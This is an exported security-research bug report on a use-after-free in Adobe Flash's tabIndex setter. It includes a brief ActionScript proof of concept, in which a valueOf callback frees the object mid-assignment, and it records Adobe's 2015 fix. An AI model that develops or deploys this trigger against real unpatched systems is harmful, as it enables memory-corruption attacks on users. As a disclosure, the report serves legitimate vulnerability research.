AN-Master / google-security-research

Automatically exported from code.google.com/p/google-security-research
0 stars 0 forks source link

Adobe Flash: Use-after-free in tabIndex setter #381

Closed GoogleCodeExporter closed 8 years ago

GoogleCodeExporter commented 8 years ago
There is a use-after-free issue in the tabIndex setter in both the Button and 
MovieClip class (this issue needs to be fixed both places). If the tabIndex is 
set, and then the number parameter has valueOf defined, it is possible to jump 
into script and free the Button or MovieClip before the tabIndex is set.

A proof-of-concept is as follows:

    _global.mc = this;

    var n = {valueOf: func};
    var test = this.createEmptyMovieClip("test", 1);
    test.tabIndex= n;

function func(){

    trace("here");
    //_global.mc.createEmptyMovieClip("test2", 1);
    var t = _global.mc.createTextField("test2", 1, 0, 0, 10, 10);
    trace(t);
    t.removeTextField();
    trace("here 2");
    return 7;

    }

A sample swf and fla is attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 14 May 2015 at 6:53

Attachments:

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 15 May 2015 at 9:21

GoogleCodeExporter commented 8 years ago
This is PSIRT-3713

Original comment by natashe...@google.com on 18 May 2015 at 10:41

GoogleCodeExporter commented 8 years ago

Original comment by cev...@google.com on 5 Jul 2015 at 6:32

GoogleCodeExporter commented 8 years ago
Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html

Original comment by cev...@google.com on 9 Jul 2015 at 12:37

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 3 Aug 2015 at 9:43